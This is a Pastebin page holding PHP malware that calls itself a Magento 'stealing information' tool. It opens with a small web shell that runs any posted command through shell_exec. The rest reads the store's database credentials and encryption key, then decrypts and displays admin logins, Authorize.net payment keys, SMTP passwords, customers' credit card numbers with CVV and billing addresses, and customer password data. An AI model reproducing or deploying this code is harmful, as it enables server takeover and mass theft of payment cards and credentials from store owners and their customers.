API tools faq
paste
Guest User

Untitled

a guest
Jan 7th, 2017
48
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 14.54 KB | None | 0 0
raw download clone embed print report diff
  1. <center>
  2. <form method="post">
  3. <input type="hidden" name="cmd" value="rm qq.php">
  4. <input type="submit" value="Delete">
  5. </form>
  6. <?php
  7. $fw = "fwrite";
  8. $ada = "function_exists";
  9. $crot = "shell_exec";
  10. if (isset($_POST['cmd'])) {
  11. $fw($mulai, $buat);
  12. if ($ada('shell_exec')) {
  13. $lihat = $_POST['cmd'];
  14. $hasil = $crot("$lihat");
  15. echo "<pre>$hasil</pre>";
  16. }
  17. }
  18. ?>
  19. <?php
  20. /*
  21. coder : sohai
  22. */
  23.  
  24. @set_time_limit(0);
  25.  
  26. echo'<head>
  27. <title>MAGENTO - stealing information</title>
  28. </head>
  29. <div id="page-wrap">
  30. <body>
  31. <style type="text/css">
  32. body,table { font-family:verdana;font-size:9px;color:#CCCCCC;background-color:#333333; }
  33. table { width:100%; border-color:#333333;border-width:0pt 1pt; border-style:solid; }
  34. td {background-color: #000500; font-family: Courier New; font-size:8pt; color:#999999; border-color:#FFFFFF; border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
  35. A:Link, A:Visited { color: #999999; text-decoration: none; }
  36. A.no:Link, A.no:Visited { text-decoration: none; }
  37. A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #666666; background-color:#333333; text-decoration: none; }
  38. input,select,option { font:8pt tahoma;color:#666666;margin:2;border:1px solid #666666; }
  39. textarea { color:#666666;font:verdana bold;border:1px solid ;margin:2; }
  40. .fleft { float:left;text-align:left; }
  41. .fright { float:right;text-align:right; }
  42. #pagebar { font:8pt tahoma;padding:5px; border:3px solid #333333; border-collapse:collapse; }
  43. #pagebar td { vertical-align:top; }
  44. #pagebar p { font:8pt tahoma;}
  45. #pagebar a { font-weight:bold;color:#666666; }
  46. #pagebar a:visited { color:#00CE00; }
  47. #mainmenu { text-align:center; }
  48. #mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
  49. #maininfo,.barheader,.barheader2 { text-align:center; }
  50. #maininfo td { padding:3px; }
  51. .barheader { font-weight:bold;padding:5px; }
  52. .barheader2 { padding:5px;border:2px solid #333333; }
  53. .contents,.explorer { border-collapse:collapse;}
  54. .contents td { vertical-align:top; }
  55. .mainpanel { border-collapse:collapse;padding:5px; }
  56. .barheader,.mainpanel table,td { border:1px solid #333333; }
  57. .mainpanel input,select,option { border:1px solid #333333;margin:0; }
  58. input[type="submit"] { border:1px solid #333333; }
  59. input[type="text"] { padding:3px;}
  60. .fxerrmsg { color:red; font-weight:bold; }
  61. #pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
  62. #pagebar,.mainpanel,input[type="submit"] { background-color:black; }
  63. .barheader2,input,select,option,input[type="submit"]:hover { background-color:black; }
  64. textarea,.mainpanel input,select,option { background-color:#000000; }
  65. // -->
  66. </style>
  67.  
  68. <body bgcolor="#ffffff" >
  69.  
  70. <center>
  71. <br>
  72. <FORM action=""  method="post">
  73. <div align="center">[M A G E N T O] - Stealing Information<br>
  74. <div align="center">coder: sohai & n4KuLa_<br>
  75. <input type="hidden" name="form_action" value="2">
  76. </div>
  77. </div>
  78. ';
  79.  
  80.  
  81. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
  82.     $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
  83.     if(isset($xml->global->resources->default_setup->connection)) {
  84.        $connection = $xml->global->resources->default_setup->connection;
  85.        $prefix = $xml->global->resources->db->table_prefix;
  86.        $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
  87.        require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
  88.        
  89.        try {
  90.            $app = Mage::app('default');
  91.            Mage::getSingleton('core/session', array('name'=>'frontend'));
  92.        }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
  93.  
  94.        if (!mysql_connect($connection->host, $connection->username, $connection->password)){
  95.            print("Could not connect: " . mysql_error());
  96.        }
  97.        mysql_select_db($connection->dbname);
  98.        echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
  99.  
  100.     $crypto = new Varien_Crypt_Mcrypt();
  101.     $crypto->init($key);
  102.  
  103.     //=========================================================================================================
  104.     $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
  105.     if (!$query){
  106.           echo "<center><b>Gagal</b></center>";
  107.     }else{
  108.             $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
  109.           echo'<br><br>
  110.                 ====================================================================<br>
  111.                                [ Admin FROM website : '.$site['website'].'] <br>
  112.                ====================================================================<br>';
  113.     }
  114.     echo "
  115.     <table border='1' align='center' >
  116.     <tr>
  117.     <td>id</td>
  118.     <td>firstname</td>
  119.     <td>lastname</td>
  120.     <td>email</td>
  121.     <td>username</td>
  122.     <td>password</td>
  123.     </tr>";
  124.         while($vx = mysql_fetch_array($query)) {
  125.         $no = 1;
  126.         $user_id = $vx['user_id'];
  127.         $username = $vx['username'];
  128.         $password = $vx['password'];
  129.         $email = $vx['email'];
  130.         $firstname = $vx['firstname'];
  131.         $lastname = $vx['lastname'];
  132.         echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
  133.         }
  134.     echo "</table><br>";
  135.     //=========================================================================================================
  136.     $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
  137.     if(mysql_num_rows($query) != 0){
  138.         if (!$query){
  139.               echo "<center><b>Gagal</b></center>";
  140.         }else{
  141.               echo'<br><br>
  142.                     ====================================================================<br>
  143.                                     [ Authorizenet ] <br>
  144.                     ====================================================================<br>';
  145.         }
  146.         echo "
  147.         <table border='1' align='center' >
  148.         <tr>
  149.         <td>user</td>
  150.         <td>pass</td>  
  151.         </tr>";
  152.             $no = 1;
  153.             while($vx = mysql_fetch_array($query)) {
  154.             $user = $crypto->decrypt($vx['user']);
  155.             $pass = $crypto->decrypt($vx['pass']);
  156.  
  157.            
  158.             echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  159.             $no++;
  160.             }
  161.         echo "</table><br>";
  162.     }
  163.     //=========================================================================================================
  164.     $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
  165.     if(mysql_num_rows($query_smtp) != 0){
  166.         if (!$query_smtp){
  167.               echo "<center><b>Gagal</b></center>";
  168.         }else{
  169.               echo'<br><br>
  170.                     ====================================================================<br>
  171.                                     [ SMTP ] <br>
  172.                     ====================================================================<br>';
  173.         }
  174.         echo "
  175.         <table border='1' align='center' >
  176.         <tr>
  177.         <td>no</td>
  178.         <td>host</td>      
  179.         <td>port</td>
  180.         <td>user</td>
  181.         <td>pass</td>  
  182.         </tr>";
  183.             $no = 1;
  184.             $batas = 0;
  185.             while($rows = mysql_fetch_array($query_smtp)) {
  186.                 $smtphost = $rows[0];
  187.                 $smtpport = $rows[1];
  188.                 $smtpuser = $rows[2];
  189.                 $smtppass = $rows[3];
  190.                 echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
  191.                 $no++;
  192.             }
  193.         echo "</table><br>";
  194.     }
  195.     //=========================================================================================================
  196.     $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
  197.     $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  198.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
  199.           echo'<br><br>
  200.                 ====================================================================<br>
  201.                                [ 16 Digit ] <br>
  202.                ====================================================================<br>';
  203.             echo "
  204.             <table border='1' align='left' >
  205.             <tr>
  206.             <td>no</td>
  207.             <td>Date</td>
  208.             <td>Credit Owner</td>
  209.             <td>method</td>
  210.             <td>Credit Number</td>
  211.             <td>Credit Exp</td>
  212.             <td>CVV</td>
  213.             <td>Address</td>
  214.             </tr>";
  215.                 $no = 1;
  216.                 $batas = 0;
  217.                 while($vx = mysql_fetch_array($query)){
  218.                 $date = $vx['updated_at'];
  219.                 $cc_owner = $vx['cc_owner'];
  220.                 $method = $vx['method'];
  221.                 $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
  222.                 $exp = $vx['exp'];     
  223.                 $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']); 
  224.                 $Billing_Address = $vx['Billing Address'];
  225.                 echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
  226.                 $batas = $no++;
  227.                 }
  228.                
  229.                 while($vx2 = mysql_fetch_array($query2)){
  230.                     $batas +=1;
  231.                 $cc_owner = $vx2['cc_owner'];
  232.                 $method = $vx2['method'];
  233.                 $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
  234.                 $exp = $vx2['exp'];    
  235.                 $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
  236.                 $Billing_Address = $vx2['Billing Address'];
  237.                 echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
  238.                  $batas++;
  239.                 }    
  240.                
  241.             echo "</table><br>";   
  242.     }
  243.     //=========================================================================================================
  244.     $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
  245.     $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
  246.    
  247.    
  248.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
  249.         if (!$query){
  250.               echo "<center><b>Gagal</b></center>";
  251.         }else{
  252.               echo'<br><br>
  253.                     ====================================================================<br>
  254.                                     [ PayPal User + Pass ] <br>
  255.                     ====================================================================<br>';
  256.         }
  257.         echo "
  258.         <table border='1' align='center' >
  259.         <center>
  260.         <tr>
  261.         <td>no</td>
  262.         <td>user</td>
  263.         <td>pass</td>  
  264.         </tr>";
  265.             $no = 1;
  266.             $batas = 0;
  267.             while($vx = mysql_fetch_array($query)) {
  268.                 $user = $vx['email'];
  269.                 $pass = $vx['value'];
  270.                 echo "<tr><pre><td>$user|$pass</td></pre></tr>";
  271.                 $batas = $no++;
  272.             }
  273.            
  274.             if(mysql_num_rows($query2) != 0 && ($query2)){
  275.                 while($vx2 = mysql_fetch_array($query2)){
  276.                     $user = $vx2['customer_email'];
  277.                     $pass = $crypto->decrypt($vx2['password_hash']);
  278.                     if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
  279.                         $batas +=1;
  280.                         echo "<tr><pre><td>$user|$pass</td></pre></tr>";
  281.                         $batas++;
  282.                     }
  283.                 }              
  284.             }
  285.        
  286.         echo "</table><br>";
  287.     }
  288.     //=========================================================================================================
  289.   }
  290. }
  291. function save($format,$data){
  292.     $fp = fopen($format, 'a');
  293.     fwrite($fp, $data);
  294.     fclose($fp);
  295. }
  296. function cekbase64($string){
  297.         $decoded = base64_decode($string, true);
  298.         if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
  299.         if(!base64_decode($string, true)) return false;
  300.         if(base64_encode($decoded) != $string) return false;
  301.         return true;//nilai return 1 jika true
  302.     }
  303. //----untuk decode password ---/
  304. class Varien_Crypt_Mcrypt{
  305.     /**
  306.      * Constuctor
  307.      *
  308.      * @param array $data
  309.      */
  310.     public function __construct()
  311.     {
  312.     }
  313.  
  314.     /**
  315.      * Initialize mcrypt module
  316.      *
  317.      * @param string $key cipher private key
  318.      * @return Varien_Crypt_Mcrypt
  319.      */
  320.     public function init($key)
  321.     {
  322.         $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
  323.         $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
  324.         $maxKeySize = mcrypt_enc_get_key_size($this->handler);
  325.  
  326.         if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
  327.             //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
  328.             return null;
  329.         }
  330.  
  331.         mcrypt_generic_init($this->handler, $key, $iv);
  332.  
  333.         return $this;
  334.     }
  335.  
  336.     /**
  337.      * Encrypt data
  338.      *
  339.      * @param string $data source string
  340.      * @return string
  341.      */
  342.     public function encrypt($data)
  343.     {
  344.         if (!$this->handler) {
  345.             //throw new Varien_Exception('Crypt module is not initialized.');
  346.             return null;
  347.         }
  348.         if (strlen($data) == 0) {
  349.             return $data;
  350.         }
  351.         return base64_encode(mcrypt_generic($this->handler, $data));
  352.     }
  353.  
  354.     /**
  355.      * Decrypt data
  356.      *
  357.      * @param string $data encrypted string
  358.      * @return string
  359.      */
  360.     public function decrypt($data)
  361.     {
  362.         if (!$this->handler) {
  363.             //throw new Varien_Exception('Crypt module is not initialized.');
  364.             return null;
  365.         }
  366.         if (strlen($data) == 0) {
  367.             return $data;
  368.         }
  369.         return mdecrypt_generic($this->handler, base64_decode($data));
  370.     }
  371.        
  372.  
  373.     /**
  374.      * Desctruct cipher module
  375.      *
  376.      */
  377.     public function __destruct()
  378.     {
  379.         if ($this->handler) {
  380.             $this->_reset();
  381.         }
  382.     }
  383.  
  384.     protected function _reset()
  385.     {
  386.         mcrypt_generic_deinit($this->handler);
  387.         mcrypt_module_close($this->handler);
  388.     }
  389. }
  390.  
  391. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!